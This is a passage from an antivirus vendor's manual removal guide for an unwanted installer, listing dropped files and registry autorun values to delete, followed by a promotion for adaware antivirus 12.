    %WinDir%\WinSxS\InstallTemp\572300\Manifests\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69.Manifest (1 bytes)
    %WinDir%\WinSxS\InstallTemp\560109\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd\ATL80.dll (601 bytes)
    %WinDir%\WinSxS\InstallTemp\586830\Manifests (4 bytes)
    %WinDir%\WinSxS\InstallTemp\581874\Manifests\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd.cat (7 bytes)
    %WinDir%\WinSxS\InstallTemp\560109\Manifests\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd.Manifest (468 bytes)
    %WinDir%\WinSxS\InstallTemp\572300\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\msvcr80.dll (5873 bytes)
    %WinDir%\WinSxS\InstallTemp\560109\Manifests\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd.cat (7 bytes)
    %WinDir%\WinSxS\InstallTemp\586830\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcp80.dll (3361 bytes)
    %WinDir%\WinSxS\InstallTemp\578184\Policies\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_d780e993\8.0.50727.4053.Policy (808 bytes)
    %WinDir%\WinSxS\InstallTemp\590281\Policies\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_77c24773\8.0.50727.4053.cat (7 bytes)
    %WinDir%\WinSxS\InstallTemp\581874\Manifests\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd.Manifest (466 bytes)
    %WinDir%\WinSxS\InstallTemp\568451\Policies\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_beca5f1f (4 bytes)
    %WinDir%\WinSxS\InstallTemp\586830\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcm80.dll (3073 bytes)
    %WinDir%\WinSxS\InstallTemp\572300\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\msvcp80.dll (7433 bytes)
    %WinDir%\WinSxS\InstallTemp\586830\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcr80.dll (4185 bytes)
    %WinDir%\WinSxS\InstallTemp\586830\Manifests\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989.cat (7 bytes)
    %WinDir%\WinSxS\InstallTemp\568451\Policies\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_beca5f1f\8.0.50727.4053.cat (7 bytes)
    %WinDir%\WinSxS\InstallTemp\578184\Policies\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_d780e993\8.0.50727.4053.cat (7 bytes)
    %WinDir%\WinSxS\InstallTemp\568451\Policies\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_beca5f1f\8.0.50727.4053.Policy (808 bytes)
    %WinDir%\WinSxS\InstallTemp\572300\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\msvcm80.dll (3073 bytes)
    %WinDir%\WinSxS\InstallTemp\584679\Policies\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_5f0bbcff\8.0.50727.4053.Policy (804 bytes)
    %WinDir%\WinSxS\InstallTemp\581874\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd\ATL80.dll (601 bytes)
    %WinDir%\WinSxS\InstallTemp\590281\Policies\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_77c24773\8.0.50727.4053.Policy (804 bytes)
    %WinDir%\WinSxS\InstallTemp\586830\Manifests\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989.Manifest (1 bytes)
    %WinDir%\WinSxS\InstallTemp\572300\Manifests\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69.cat (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\QQPCMgr_Setup.exe (6588078 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\D610144C-D2B9-429A-BDD5-C143E00B5CE3\05a00036.exe (23407 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "05a00036" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\D610144C-D2B9-429A-BDD5-C143E00B5CE3\05a00036.exe /start"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "WinSideBySideSetupCleanup 578184" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\578184"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "WinSideBySideSetupCleanup 560109" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\560109"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "WinSideBySideSetupCleanup 581874" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\581874"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "WinSideBySideSetupCleanup 590281" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\590281"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "WinSideBySideSetupCleanup 584679" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\584679"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "WinSideBySideSetupCleanup 586830" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\586830"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "WinSideBySideSetupCleanup 572300" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\572300"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "WinSideBySideSetupCleanup 568451" = "rundll32 sxs.dll,SxspRunDllDeleteDirectory %WinDir%\WinSxS\InstallTemp\568451"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet

x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now